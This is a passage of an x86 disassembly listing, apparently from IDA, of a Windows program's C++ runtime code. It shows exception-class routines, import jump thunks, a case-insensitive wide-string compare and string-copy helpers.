var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A760
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_38]
call sub_40DC1A
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43A7C0
push offset dword_43E550
lea edx, [ebp+var_28]
push edx
call sub_43B240
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A7C0 proc near ; CODE XREF: sub_43A760+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A640
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E148
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A7C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A7F0 proc near ; CODE XREF: sub_43A840+A�p
; DATA XREF: _1:0043E554�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43E148
mov ecx, [ebp+var_4]
call sub_43A580
mov esp, ebp
pop ebp
retn
sub_43A7F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A810 proc near ; DATA XREF: _1:0043E150�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43A870
push offset dword_43E550
lea ecx, [ebp+var_1C]
push ecx
call sub_43B240
mov esp, ebp
pop ebp
retn
sub_43A810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A840 proc near ; DATA XREF: _1:off_43E148�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43A7F0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43A865
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43A865: ; CODE XREF: sub_43A840+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A870 proc near ; CODE XREF: sub_43A810+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A4C0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E148
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A8A0 proc near ; DATA XREF: _2:0043F014�o
push ebp
mov ebp, esp
call sub_40E188
call sub_43A8C0
call sub_43A8E0
call sub_43A910
pop ebp
retn
sub_43A8A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A8C0 proc near ; CODE XREF: sub_43A8A0+8�p
push ebp
mov ebp, esp
push offset nullsub_1
call sub_420D10
add esp, 4
pop ebp
retn
sub_43A8C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A8E0 proc near ; CODE XREF: sub_43A8A0+D�p
push ebp
mov ebp, esp
xor eax, eax
mov al, ds:byte_4F4A3C
and eax, 1
test eax, eax
jnz short loc_43A900
mov cl, ds:byte_4F4A3C
or cl, 1
mov ds:byte_4F4A3C, cl
loc_43A900: ; CODE XREF: sub_43A8E0+F�j
pop ebp
retn
sub_43A8E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A910 proc near ; CODE XREF: sub_43A8A0+12�p
push ebp
mov ebp, esp
push offset sub_43A930
call sub_420D10
add esp, 4
pop ebp
retn
sub_43A910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A930 proc near ; DATA XREF: sub_43A910+3�o
push ebp
mov ebp, esp
pop ebp
retn
sub_43A930 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43A936 proc near ; CODE XREF: sub_40E29B+6F�p
jmp ds:dword_4F54F4
sub_43A936 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F554C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43A942 proc near ; CODE XREF: sub_40D5A3+5E�p
; sub_40F2F1+148�p ...
jmp ds:dword_4F5548
sub_43A942 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F5544
; ---------------------------------------------------------------------------
jmp ds:dword_4F5540
; ---------------------------------------------------------------------------
jmp ds:dword_4F553C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5538
; ---------------------------------------------------------------------------
jmp ds:dword_4F5534
; ---------------------------------------------------------------------------
jmp ds:dword_4F5530
; ---------------------------------------------------------------------------
jmp ds:dword_4F552C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5528
; ---------------------------------------------------------------------------
jmp ds:dword_4F5550
; ---------------------------------------------------------------------------
jmp ds:dword_4F5520
; ---------------------------------------------------------------------------
jmp ds:dword_4F551C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5518
; ---------------------------------------------------------------------------
jmp ds:dword_4F5514
; ---------------------------------------------------------------------------
jmp ds:dword_4F5510
; ---------------------------------------------------------------------------
jmp ds:dword_4F550C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5508
; ---------------------------------------------------------------------------
jmp ds:dword_4F5504
; ---------------------------------------------------------------------------
jmp ds:dword_4F5500
; ---------------------------------------------------------------------------
jmp ds:dword_4F54FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5524
; ---------------------------------------------------------------------------
jmp ds:off_4F5338
; ---------------------------------------------------------------------------
jmp ds:off_4F533C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5340
; ---------------------------------------------------------------------------
jmp ds:off_4F5344
; ---------------------------------------------------------------------------
jmp ds:dword_4F5348
; ---------------------------------------------------------------------------
jmp ds:dword_4F534C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5350
; ---------------------------------------------------------------------------
jmp ds:dword_4F5354
; ---------------------------------------------------------------------------
jmp ds:dword_4F5358
; ---------------------------------------------------------------------------
jmp ds:dword_4F535C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5360
; ---------------------------------------------------------------------------
jmp ds:dword_4F5364
; ---------------------------------------------------------------------------
jmp ds:dword_4F5368
; ---------------------------------------------------------------------------
jmp ds:off_4F536C
; ---------------------------------------------------------------------------
jmp ds:off_4F5370
; ---------------------------------------------------------------------------
jmp ds:dword_4F5374
; ---------------------------------------------------------------------------
jmp ds:dword_4F5378
; ---------------------------------------------------------------------------
jmp ds:dword_4F537C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5380
; ---------------------------------------------------------------------------
jmp ds:dword_4F5384
; ---------------------------------------------------------------------------
jmp ds:dword_4F5388
; ---------------------------------------------------------------------------
jmp ds:off_4F538C
; ---------------------------------------------------------------------------
jmp ds:off_4F5390
; ---------------------------------------------------------------------------
jmp ds:dword_4F5394
; ---------------------------------------------------------------------------
jmp ds:dword_4F5398
; ---------------------------------------------------------------------------
jmp ds:dword_4F539C
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53A8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53AC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53B8
; ---------------------------------------------------------------------------
jmp ds:off_4F53BC
; ---------------------------------------------------------------------------
jmp ds:off_4F53C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53D8
; ---------------------------------------------------------------------------
jmp ds:off_4F53DC
; ---------------------------------------------------------------------------
jmp ds:off_4F53E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F53E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53E8
; ---------------------------------------------------------------------------
jmp ds:off_4F53EC
; ---------------------------------------------------------------------------
jmp ds:off_4F53F0
; ---------------------------------------------------------------------------
jmp ds:off_4F53F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F53F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F53FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5400
; ---------------------------------------------------------------------------
jmp ds:dword_4F5404
; ---------------------------------------------------------------------------
jmp ds:dword_4F5408
; ---------------------------------------------------------------------------
jmp ds:dword_4F540C
; ---------------------------------------------------------------------------
jmp ds:off_4F5410
; ---------------------------------------------------------------------------
jmp ds:dword_4F52D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F5414
; ---------------------------------------------------------------------------
jmp ds:dword_4F5418
; ---------------------------------------------------------------------------
jmp ds:dword_4F541C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5420
; ---------------------------------------------------------------------------
jmp ds:dword_4F5424
; ---------------------------------------------------------------------------
jmp ds:dword_4F5428
; ---------------------------------------------------------------------------
jmp ds:dword_4F542C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5430
; ---------------------------------------------------------------------------
jmp ds:dword_4F5434
; ---------------------------------------------------------------------------
jmp ds:off_4F5438
; ---------------------------------------------------------------------------
jmp ds:off_4F543C
; ---------------------------------------------------------------------------
jmp ds:off_4F5440
; ---------------------------------------------------------------------------
jmp ds:dword_4F5444
; ---------------------------------------------------------------------------
jmp ds:dword_4F5448
; ---------------------------------------------------------------------------
jmp ds:dword_4F544C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5450
; ---------------------------------------------------------------------------
jmp ds:dword_4F5454
; ---------------------------------------------------------------------------
jmp ds:dword_4F5458
; ---------------------------------------------------------------------------
jmp ds:dword_4F545C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5460
; ---------------------------------------------------------------------------
jmp ds:dword_4F5464
; ---------------------------------------------------------------------------
jmp ds:dword_4F5468
; ---------------------------------------------------------------------------
jmp ds:dword_4F546C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5470
; ---------------------------------------------------------------------------
jmp ds:dword_4F5474
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43ABA6 proc near ; CODE XREF: sub_4203C0+27�p
; sub_420730+13�p
jmp ds:dword_4F5478
sub_43ABA6 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F547C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5480
; ---------------------------------------------------------------------------
jmp ds:dword_4F5484
; ---------------------------------------------------------------------------
jmp ds:dword_4F5488
; ---------------------------------------------------------------------------
jmp ds:dword_4F548C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5490
; ---------------------------------------------------------------------------
jmp ds:dword_4F5494
; ---------------------------------------------------------------------------
jmp ds:dword_4F5498
; ---------------------------------------------------------------------------
jmp ds:dword_4F549C
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54A8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54AC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54B8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54BC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54D8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F54E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F54EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F5334
; ---------------------------------------------------------------------------
jmp ds:dword_4F5330
; ---------------------------------------------------------------------------
jmp ds:dword_4F532C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5328
; ---------------------------------------------------------------------------
jmp ds:dword_4F5324
; ---------------------------------------------------------------------------
jmp ds:dword_4F5320
; ---------------------------------------------------------------------------
jmp ds:dword_4F531C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5318
; ---------------------------------------------------------------------------
jmp ds:dword_4F5314
; ---------------------------------------------------------------------------
jmp ds:dword_4F5310
; ---------------------------------------------------------------------------
jmp ds:dword_4F530C
; ---------------------------------------------------------------------------
jmp ds:dword_4F5308
; ---------------------------------------------------------------------------
jmp ds:dword_4F5304
; ---------------------------------------------------------------------------
jmp ds:off_4F5300
; ---------------------------------------------------------------------------
jmp ds:dword_4F52FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F52F0
; ---------------------------------------------------------------------------
jmp ds:dword_4F52EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F52E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F52DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F52D8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ACF0 proc near ; CODE XREF: sub_417BC7+E2�p
; sub_417BC7+F9�p ...
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
cmp ds:dword_4F33F8, 0
jnz loc_43ADBA
loc_43AD03: ; CODE XREF: sub_43ACF0+BF�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 5Ah
jg short loc_43AD2D
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
cmp eax, 41h
jl short loc_43AD2D
mov ecx, [ebp+arg_0]
xor edx, edx
mov dx, [ecx]
add edx, 20h
mov [ebp+var_10], edx
jmp short loc_43AD38
; ---------------------------------------------------------------------------
loc_43AD2D: ; CODE XREF: sub_43ACF0+1E�j
; sub_43ACF0+2B�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax]
mov [ebp+var_10], ecx
loc_43AD38: ; CODE XREF: sub_43ACF0+3B�j
mov dx, word ptr [ebp+var_10]
mov word ptr [ebp+var_4], dx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 5Ah
jg short loc_43AD6A
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx]
cmp eax, 41h
jl short loc_43AD6A
mov ecx, [ebp+arg_4]
xor edx, edx
mov dx, [ecx]
add edx, 20h
mov [ebp+var_14], edx
jmp short loc_43AD75
; ---------------------------------------------------------------------------
loc_43AD6A: ; CODE XREF: sub_43ACF0+5B�j
; sub_43ACF0+68�j
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax]
mov [ebp+var_14], ecx
loc_43AD75: ; CODE XREF: sub_43ACF0+78�j
mov dx, word ptr [ebp+var_14]
mov word ptr [ebp+var_C], dx
mov eax, [ebp+arg_0]
add eax, 2
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
mov edx, [ebp+var_4]
and edx, 0FFFFh
test edx, edx
jz short loc_43ADB5
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+var_C]
and ecx, 0FFFFh
cmp eax, ecx
jz loc_43AD03
loc_43ADB5: ; CODE XREF: sub_43ACF0+AA�j
jmp loc_43AE7A
; ---------------------------------------------------------------------------
loc_43ADBA: ; CODE XREF: sub_43ACF0+D�j
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_43ADEC
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_8], 1
jmp short loc_43ADF3
; ---------------------------------------------------------------------------
loc_43ADEC: ; CODE XREF: sub_43ACF0+DC�j
mov [ebp+var_8], 0
loc_43ADF3: ; CODE XREF: sub_43ACF0+FA�j
; sub_43ACF0+16B�j
mov edx, [ebp+arg_0]
mov ax, [edx]
mov [ebp+var_16], ax
mov cx, [ebp+var_16]
push ecx
mov edx, [ebp+arg_0]
add edx, 2
mov [ebp+arg_0], edx
call sub_43B360
add esp, 4
mov word ptr [ebp+var_4], ax
mov eax, [ebp+arg_4]
mov cx, [eax]
mov [ebp+var_18], cx
mov dx, [ebp+var_18]
push edx
mov eax, [ebp+arg_4]
add eax, 2
mov [ebp+arg_4], eax
call sub_43B360
add esp, 4
mov word ptr [ebp+var_C], ax
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_43AE5D
mov edx, [ebp+var_4]
and edx, 0FFFFh
mov eax, [ebp+var_C]
and eax, 0FFFFh
cmp edx, eax
jz short loc_43ADF3
loc_43AE5D: ; CODE XREF: sub_43ACF0+156�j
cmp [ebp+var_8], 0
jz short loc_43AE6F
push 13h
call sub_423320
add esp, 4
jmp short loc_43AE7A
; ---------------------------------------------------------------------------
loc_43AE6F: ; CODE XREF: sub_43ACF0+171�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_43AE7A: ; CODE XREF: sub_43ACF0:loc_43ADB5�j
; sub_43ACF0+17D�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+var_C]
and ecx, 0FFFFh
sub eax, ecx
mov esp, ebp
pop ebp
retn
sub_43ACF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AEA0 proc near ; CODE XREF: sub_4189CD+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_43AEAE
xor eax, eax
jmp short loc_43AEE3
; ---------------------------------------------------------------------------
loc_43AEAE: ; CODE XREF: sub_43AEA0+8�j
mov eax, [ebp+arg_0]
push eax
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_41BE40
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_43AEE1
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_41F620
add esp, 8
jmp short loc_43AEE3
; ---------------------------------------------------------------------------
loc_43AEE1: ; CODE XREF: sub_43AEA0+2D�j
xor eax, eax
loc_43AEE3: ; CODE XREF: sub_43AEA0+C�j
; sub_43AEA0+3F�j
mov esp, ebp
pop ebp
retn
sub_43AEA0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
mov dword ptr [eax], offset off_43E15C
mov ecx, [ebp-4]
mov dword ptr [ecx+4], 0
mov edx, [ebp-4]
mov dword ptr [edx+8], 0
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AF20 proc near ; DATA XREF: _1:off_43E15C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43B080
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43AF45
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43AF45: ; CODE XREF: sub_43AF20+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43AF20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AF50 proc near ; CODE XREF: sub_43A640+2C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax], offset off_43E15C
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_420C30
add esp, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+4], ecx
mov edx, [ebp+var_8]
cmp dword ptr [edx+4], 0
jz short loc_43AFA6
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call sub_41F620
add esp, 8
loc_43AFA6: ; CODE XREF: sub_43AF50+3F�j
mov ecx, [ebp+var_8]
mov dword ptr [ecx+8], 1
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_43AF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AFC0 proc near ; CODE XREF: sub_43A4C0+23�p
; _0:0043B06E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax], offset off_43E15C
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ecx+8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+8], 0
jz short loc_43B02F
mov edx, [ebp+arg_0]
mov eax, [edx+4]
push eax
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_420C30
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov [ecx+4], edx
mov eax, [ebp+var_8]
cmp dword ptr [eax+4], 0
jz short loc_43B02D
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+4]
push ecx
call sub_41F620
add esp, 8
loc_43B02D: ; CODE XREF: sub_43AFC0+55�j
jmp short loc_43B03B
; ---------------------------------------------------------------------------
loc_43B02F: ; CODE XREF: sub_43AFC0+25�j
mov edx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [edx+4], ecx
loc_43B03B: ; CODE XREF: sub_43AFC0:loc_43B02D�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_43AFC0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
cmp eax, [ebp+8]
jz short loc_43B073
mov ecx, [ebp-4]
call sub_43B080
mov ecx, [ebp+8]
push ecx
mov ecx, [ebp-4]
call sub_43AFC0
loc_43B073: ; CODE XREF: _0:0043B05D�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B080 proc near ; CODE XREF: sub_43A580+41�p
; sub_43AF20+A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax], offset off_43E15C
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+8], 0
jz short loc_43B0B0
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43B0B0: ; CODE XREF: sub_43B080+19�j
mov esp, ebp
pop ebp
retn
sub_43B080 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B0C0 proc near ; DATA XREF: _1:0043E160�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jz short loc_43B0D8
mov ecx, [ebp+var_4]
mov eax, [ecx+4]
jmp short loc_43B0DD
; ---------------------------------------------------------------------------
loc_43B0D8: ; CODE XREF: sub_43B0C0+E�j
mov eax, offset aUnknownExcepti ; "Unknown exception"
loc_43B0DD: ; CODE XREF: sub_43B0C0+16�j
mov esp, ebp
pop ebp
retn
sub_43B0C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B0F0 proc near ; CODE XREF: sub_43B130+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43E17C
push 1Bh
call sub_423280
add esp, 4
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0
jz short loc_43B122
mov edx, [ebp+var_4]
mov eax, [edx+4]
push eax
call sub_423CD0
add esp, 4
loc_43B122: ; CODE XREF: sub_43B0F0+21�j
push 1Bh
call sub_423320
add esp, 4
mov esp, ebp
pop ebp
retn
sub_43B0F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B130 proc near ; DATA XREF: _1:off_43E17C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43B0F0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43B155
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43B155: ; CODE XREF: sub_43B130+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B130 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 9
push eax
mov ecx, [ebp+8]
add ecx, 9
push ecx
call sub_41F7E0
add esp, 8
neg eax
sbb eax, eax
inc eax
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 9
push eax
mov ecx, [ebp+8]
add ecx, 9
push ecx
call sub_41F7E0
add esp, 8
neg eax
sbb eax, eax
neg eax
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 9
push eax
mov ecx, [ebp+8]
add ecx, 9
push ecx
call sub_41F7E0
add esp, 8
xor edx, edx
test eax, eax
setnle dl
mov eax, edx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 8
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
mov dword ptr [eax], offset off_43E17C
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B240 proc near ; CODE XREF: sub_43A460+48�p
; sub_43A550+1E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push esi
push edi
mov ecx, 8
mov esi, offset dword_43E180
lea edi, [ebp+var_20]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_20]
push edx
